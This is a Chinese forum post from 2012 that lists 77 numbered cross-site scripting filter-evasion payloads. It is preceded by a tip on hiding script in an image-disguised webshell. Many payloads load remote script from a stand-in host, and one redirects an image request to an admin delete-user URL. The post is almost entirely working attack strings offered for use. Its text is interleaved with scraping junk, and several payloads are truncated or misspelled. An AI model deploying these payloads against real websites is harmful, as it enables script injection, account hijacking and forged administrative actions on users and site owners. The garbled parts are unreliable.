跨站图片shell
' n# P( c- M" r* J8 aXSS跨站代码 <script>alert("")</script>9 |0 u( c( z$ G, I( B
. y2 w! L! p: u- A7 O1 r8 h9 _将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
: t/ z, ]. v7 j W% t3 i( D" J2 m, T( [6 g* p" i
+ t+ |8 _' ]" o
" b. v+ z+ f$ \& Z# W. z9 m1)普通的XSS JavaScript注入5 M0 w3 G* }! n6 ?7 P; v: r" B
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>: b. g# M* \5 l4 N5 c
$ ^$ }! M3 ~+ F: o7 O
(2)IMG标签XSS使用JavaScript命令
% t+ y! s! t B% S$ [" _8 V! I<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, o/ {: X* L7 r U. t2 P, {+ a, ~. y6 L$ x. l- ?
(3)IMG标签无分号无引号
+ l) ~* ~; Q7 X' O6 h; p4 T<IMG SRC=javascript:alert(‘XSS’)>
: y7 a+ t; h/ D5 }
: u$ u1 X6 p2 t! `+ }* z S. _(4)IMG标签大小写不敏感3 y( [; y- h+ V8 D* |/ ~
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
2 L9 Z' ~8 q+ A0 A$ Y! _3 f% H- u+ d! x- s" `
(5)HTML编码(必须有分号)
% i6 m+ P [0 T' r<IMG SRC=javascript:alert(“XSS”)>) [1 _, l5 {7 f& h# S* f
* J$ @5 c# m% r(6)修正缺陷IMG标签
' n) N: ? Y+ _3 A* R m<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
* Y. \+ K7 |+ K) s% s1 D
0 }* M2 e; S( S! L(7)formCharCode标签(计算器)% k7 X; z8 ?* ^( |6 T
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
$ y+ I! ~* H3 h' D. e; u5 Q1 c, F2 P" E) C$ B
(8)UTF-8的Unicode编码(计算器)
- E0 B5 X0 V u9 v1 D3 {<IMG SRC=jav..省略..S')>
7 d9 o6 U8 }1 d" {( ^( z& S! v. K% j; j" j/ O0 @- u( i
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)8 d; [5 Z8 h* D6 \* U
<IMG SRC=jav..省略..S')>$ A* \% | H8 [( ]
2 H0 N% l5 ~$ w$ w' r+ G: S1 _(10)十六进制编码也是没有分号(计算器)7 ~( O( @/ v( c+ @% x6 J
<IMG SRC=java..省略..XSS')>5 I* n' h3 a5 L/ ~
/ L3 l5 ]( E2 {7 S
(11)嵌入式标签,将Javascript分开
M8 j/ R7 s* t; e: K, i<IMG SRC=”jav ascript:alert(‘XSS’);”>. Y- p" p( u" d3 q
* O* z% C. w2 e% f(12)嵌入式编码标签,将Javascript分开
, T# N; m/ T& T# e6 p" L7 M<IMG SRC=”jav ascript:alert(‘XSS’);”>
# c# ?$ l) P% e. w
) V* |3 o' S6 G0 v8 v4 ~ C(13)嵌入式换行符& Z) f3 {+ m' T/ x
<IMG SRC=”jav ascript:alert(‘XSS’);”>
: d6 s, m: E, t$ Y, G" q3 _% Q) I2 [- _/ Z1 R5 a
(14)嵌入式回车% ^3 B, v$ l6 } Q8 E
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 W- K# }. i% h$ W! b
# q0 o3 e; o4 ~7 M/ T(15)嵌入式多行注入JavaScript,这是XSS极端的例子
, g: }) T M7 M, c- t0 H) i<IMG SRC=”javascript:alert(‘XSS‘)”>9 i8 W% s$ r4 {) X4 j8 y
5 B7 N* ?. |8 G: ], B, w- ^( G5 @(16)解决限制字符(要求同页面); K) @( G) v M$ |& P
<script>z=’document.’</script>
8 B0 s/ I- k: u# G3 N<script>z=z+’write(“‘</script>
+ W y, _- V; N; f7 U+ a& k<script>z=z+’<script’</script>! ?+ ?; X5 `# }
<script>z=z+’ src=ht’</script>
% O, Y' c8 B- z8 }<script>z=z+’tp://ww’</script># d9 z, ]* N# V* c4 d# x
<script>z=z+’w.shell’</script>
9 ~, Q0 R: e1 n* A<script>z=z+’.net/1.’</script>
. R9 C$ l3 E) }2 L1 G- b<script>z=z+’js></sc’</script>8 F* U! o+ J( K. x
<script>z=z+’ript>”)’</script>4 P# \5 H& r- L- U* a
<script>eval_r(z)</script>
% N/ ]! D, R) H" w
/ u' p# c! U$ L(17)空字符* y* T0 y& \& Z9 g+ I
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
* P+ j( W/ P0 S; \' a7 v$ X
3 h; t! A( [3 K0 u! _* T7 l(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
5 A" D4 L. X6 yperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out! I# @! m+ v' y4 {* ^
1 n# Y2 q' A$ j- D/ b, f1 Z. w4 l4 x(19)Spaces和meta前的IMG标签3 o- R3 Q, ~# s' J8 w$ Z( M2 Z7 }
<IMG SRC=” javascript:alert(‘XSS’);”>
6 a4 K! R; ~( M
9 Z% Z0 e0 o' |; ?( v0 c(20)Non-alpha-non-digit XSS7 M6 y; a& q6 J4 Y$ Q
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
, S* |4 g3 X& w* z w ]7 H1 K2 X1 z s D6 y5 A
(21)Non-alpha-non-digit XSS to 2% c* ]/ J, e5 q9 ]+ C
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>6 ` p8 [) h7 g' h# }6 C9 y
7 l4 i9 b5 V- e& O(22)Non-alpha-non-digit XSS to 3
. Y. G* j( [& @6 r" E<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! H% P+ s/ H3 U/ O1 ~' e& U) _8 T3 w2 w
(23)双开括号
) E) K4 v% n- s5 I8 f<<SCRIPT>alert(“XSS”);//<</SCRIPT>+ G1 y D6 R# Q0 s7 f& ~
. W* z3 r+ [" J0 K- f
(24)无结束脚本标记(仅火狐等浏览器)2 I7 n* S! P7 \/ Y( C3 q8 E; D
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
1 Y( p# i8 L' Q; o
) K. M. t9 y$ h' P9 V- e3 ~: Y& I, y(25)无结束脚本标记2
L: ~2 o1 N* S! E<SCRIPT SRC=//3w.org/XSS/xss.js>
+ U! {9 h+ D" ^- O8 F$ t
. v! }5 I( v4 e" A(26)半开的HTML/JavaScript XSS
" ~1 X% i/ v: O% S0 j& \- ]4 }" l<IMG SRC=”javascript:alert(‘XSS’)”
! a! J3 P+ ?) V# S. f1 V+ K' S7 ?5 h5 L2 _9 C4 E* K7 @
(27)双开角括号
6 [& @: w! k. @( M1 t<iframe src=http://3w.org/XSS.html <
$ V9 i5 K7 j# @9 L6 o' A+ h4 {* T) N
(28)无单引号 双引号 分号( U4 ]2 |6 }; w+ u
<SCRIPT>a=/XSS/
* \0 t; N2 o6 V, u1 {1 O/ kalert(a.source)</SCRIPT>
' ?, y/ `: L5 u: }$ v$ m& [, i' v0 I7 |. u! U @$ L
(29)换码过滤的JavaScript
+ i1 m( E, v, f2 I\”;alert(‘XSS’);//7 d( _' T2 g6 ^4 Y1 W, v8 f
. Z' Z# a2 k* x5 _* j6 c( _
(30)结束Title标签
& y4 ^1 a' u: D ]1 A2 [- F/ p) d</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
$ h6 Q' V; r' l$ L9 O. I9 @ g' m& b/ h2 @
(31)Input Image
* A" ^. y1 e, s: B$ [) n( m: {<INPUT SRC=”javascript:alert(‘XSS’);”>, w6 o9 W0 f7 G% s5 ?- h
+ z0 R* @5 w5 o7 f
(32)BODY Image3 i. M5 p$ F& K8 U2 v# U9 v
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
1 T# i8 A8 c0 ~4 c* x& Q% T0 O5 y/ D1 J, U9 D+ [) y- s
(33)BODY标签7 ^8 }; `0 {# b& k* W% s
<BODY(‘XSS’)>/ ?# F" U3 p8 p$ T/ y9 ~
! Y5 M% s, h0 v$ x6 s(34)IMG Dynsrc
+ i5 z5 @) Q& e5 r5 F5 a<IMG DYNSRC=”javascript:alert(‘XSS’)”>
. n% X. |" E- \% q; \" ?& `( V
! r) b' P) e: T/ h- L(35)IMG Lowsrc8 d- J* h8 K% G: o F$ z- j# q% F. g" K
<IMG LOWSRC=”javascript:alert(‘XSS’)”>! C$ P7 p$ \: z: G# j) I' w
+ {8 K$ w4 [' D% H7 y(36)BGSOUND, J, i" j. d. N( E. `9 D
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
( D5 D$ p' E6 q" P
& [$ I& R' A+ A" s2 N8 `(37)STYLE sheet
: f7 a" y- K& ]" x<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
& k6 t* V- d0 E% b
! h6 e8 `" y9 S4 Y* o$ x7 \(38)远程样式表
% l1 ?' M6 y- m. ^; L: _4 [<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>4 _+ B- [0 y0 e# l c: K
: I. g: {# K# C7 ~( x h
(39)List-style-image(列表式)$ B5 b- F$ \% B" V( F
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
' `7 }1 @6 | B
: N, `+ |4 Q, F# ^5 _% ~- n(40)IMG VBscript
8 ^# X: k0 x1 l' F) B. ^<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
5 T- X/ M7 A5 k3 U* o: a9 ?# u: \! l8 \- K; d9 P _% @$ a* v" n
(41)META链接url {# p: u2 `+ L5 l6 B$ d$ _
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>+ Z v! O' W5 ?0 x9 D9 R) U% D
6 T0 ~' X; A: ]: J( U3 f* M3 `
(42)Iframe
/ z/ q0 ~7 x G$ h<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>: K# Q- o: d1 c
(43)Frame) _" M1 s) @7 ?$ n8 `
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
+ F0 c% ]3 Q; v/ ]: R* @* J: I( u; ?% C1 E& [
(44)Table' r- _, [/ K4 u. Q n) r
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
9 ^ N9 f8 J- e& k+ `: |- K' d
6 d, N: d- T m# s( C+ d6 P(45)TD
% I" q+ s- n4 r N% B0 _<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>+ k% h- P; M$ M% A5 V0 I
, L4 P' w- M |7 |, ~; e) a(46)DIV background-image0 X3 L+ z5 H- n3 M
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>* w4 D! c f- f
% \6 ]3 O1 N# y. u" o( ~(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
9 `) `) |: ?0 Q6 W<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
7 l5 s& g, Y: s% e
4 z! c" u/ d" G; C7 P9 y(48)DIV expression
: \; G5 D/ V* A+ f<DIV STYLE=”width: expression_r(alert(‘XSS’));”>; V% q2 j6 n# O+ J* q z
8 t0 O; Y5 n% c
(49)STYLE属性分拆表达4 [+ p) |1 F" h& D
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ O, T3 }) `' L, x. C! o8 l7 B. _7 v$ f8 S% N! A( x1 _
(50)匿名STYLE(组成:开角号和一个字母开头)
) h# B! B( b8 K# k<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
' P; p6 B/ {( k1 a, e, ]4 j- c
(51)STYLE background-image* X' x) f9 p0 {7 ?! \+ H( ]
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>( C/ M( v8 Y& |' a/ ?4 k: c/ \: E( v
$ b4 P$ ^( [3 ^, t4 v5 m
(52)IMG STYLE方式' n# i! a1 \% G/ T6 s+ \
exppression(alert(“XSS”))’>0 e. E2 D7 Q5 q0 h0 V4 a9 d" X9 P2 n& u
3 j2 ?# f6 F: h(53)STYLE background
8 u9 b* ~* h; N* N/ [<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>7 B4 L3 B& ~* C0 f) `
: o4 c& D+ o, L+ W
(54)BASE
( A$ V& w- Z+ r4 P1 A! v<BASE HREF=”javascript:alert(‘XSS’);//”>
! g7 u2 A' p! r* M- H) X
Y9 @/ |) s. f* m9 |/ q. a(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS. A8 c& _/ G# g! T- |* R
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
9 k) z2 M# v( p6 [ h- B, f! B. ]. e
(56)在flash中使用ActionScrpt可以混进你XSS的代码( {& X( ?' t3 {; k7 @, Y+ [3 P
a=”get”;/ H7 x- S; E6 ~4 P
b=”URL(\”";
; F( i# n8 S2 E+ Z& {c=”javascript:”;% p6 S @5 ~; w7 b) `, g
d=”alert(‘XSS’);\”)”;
3 D0 t( x ^" f; Z4 c; r1 G6 d' \eval_r(a+b+c+d);
8 L. V- I* e7 X( E( j. O9 z' }0 X. [0 t6 g+ E' ?
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上7 J8 C& `1 l' K
<HTML xmlns:xss>
H6 p, C" ?; c+ F4 Q% N6 o3 i+ U<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
" c. _3 l! | g7 |! ]" H K<xss:xss>XSS</xss:xss>; y4 l8 {- P% d0 S# |
</HTML>; g% E# ]$ Y& [' m; J& ~6 I$ J
2 _4 c3 ~$ o+ E# A N) y) P(58)如果过滤了你的JS你可以在图片里添加JS代码来利用" E, _* b9 t& }' J _* p/ w- W+ f
<SCRIPT SRC=””></SCRIPT>! V) {" e& c, n; `& Z
7 a3 s0 n7 W; f9 c(59)IMG嵌入式命令,可执行任意命令* l; c0 V" g+ J8 G9 L! W l
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
+ o4 | y$ b. T1 {( p3 @/ t3 ^$ L. q+ S' l* N
(60)IMG嵌入式命令(a.jpg在同服务器)
# ?* A2 [# d4 }. U# F! RRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser# ~8 ]6 M8 u3 s0 v/ _9 j
5 {: h( u y, W(61)绕符号过滤
! I% b& ]9 G( d<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
( e: G1 e% z3 b' \
. x: l$ |& W# M5 ?' R(62)& C! r. N& l) \( M4 Q; y( q
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>2 @+ y, ^( Y+ P, t- p; _! n
: [; m3 T' O: U9 I
(63)
3 ?! K" A. J. ~" k. z5 o7 e<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>$ t9 x, ~0 C0 E, ]( ~
+ R( `# x. M0 D" v* x# b(64)" X p3 v+ g+ n* n- A7 B
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
5 W. Q7 F# ?: R6 a& k1 ~5 ~1 p! c8 r6 S/ ]3 m# C
(65)
1 `; c: J, F7 N3 L" r<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
4 ]7 r! j0 R e1 \ `
% d1 w: _9 }7 n( g4 F(66). \5 |8 g: j7 o" S# q7 r$ k4 x
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>/ h7 \0 j( Y+ q% u! } C
P- X& X; r6 k1 k. Z
(67): d7 Y& N1 r/ { T7 r
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>9 f( d1 g( H* P* w9 O
. S2 M8 J2 v- v, G- E! k; D(68)URL绕行5 K: _+ P; y% g& T
<A HREF=”http://127.0.0.1/”>XSS</A>
, Q3 h0 [5 y% A! W- X' m# T0 [/ W z/ }% `, g
(69)URL编码
+ Y6 R! u! `5 D2 N6 q<A HREF=”http://3w.org”>XSS</A>
: O6 r3 v$ y" U7 [) w4 M
- Z# k& l" u, S0 y, e) Y1 E' Z; [+ Z2 C+ x(70)IP十进制# s. z& r7 M7 C! e3 U: g" T
<A HREF=”http://3232235521″>XSS</A>
/ v2 j) B0 l6 r: a7 ^. V" o+ [0 T* S5 G) z( K, A. W! X! l$ N
(71)IP十六进制0 x) Z8 e. ]) V, D
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>- d' I; ]! S2 w* D& ^
. v- V9 k F. ]; s. \
(72)IP八进制. f7 J& v1 h/ N0 F. f# N" e$ |
<A HREF=”http://0300.0250.0000.0001″>XSS</A>* o' \1 ]) ^' u* m. Z/ o. i
/ h1 w. \ u+ o0 u
(73)混合编码
$ d9 Z( i8 G. `& j) n3 W5 v<A HREF=”h
2 P2 I- h$ y% w( l/ z2 jtt p://6 6.000146.0×7.147/”">XSS</A>; u: P% \# p, w% U6 m* V6 c
# a _0 W) X% j$ V6 n: e: H$ n/ X
(74)节省[http:]
0 f, n# R* }" O2 J. W1 h! l<A HREF=”//www.google.com/”>XSS</A>
. f$ g2 c- s- {8 q% F9 o& f: C T. q+ j
(75)节省[www]; j, P1 n: S D+ _8 F
<A HREF=”http://google.com/”>XSS</A>
/ _, P' u& o R+ g0 z( e, E+ k3 k: M8 m
(76)绝对点绝对DNS
0 K( H0 W( O+ i/ H/ D<A HREF=”http://www.google.com./”>XSS</A>
% e' a* o7 t8 r! }# M' a4 Y9 j0 |+ Y% E& {
(77)javascript链接1 w9 F3 d" m( X) ~/ @1 L
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>) |/ m) o9 p* m8 {8 p. H% [9 t
|
发表于 2012-9-13 17:04:56
收藏
支持
反对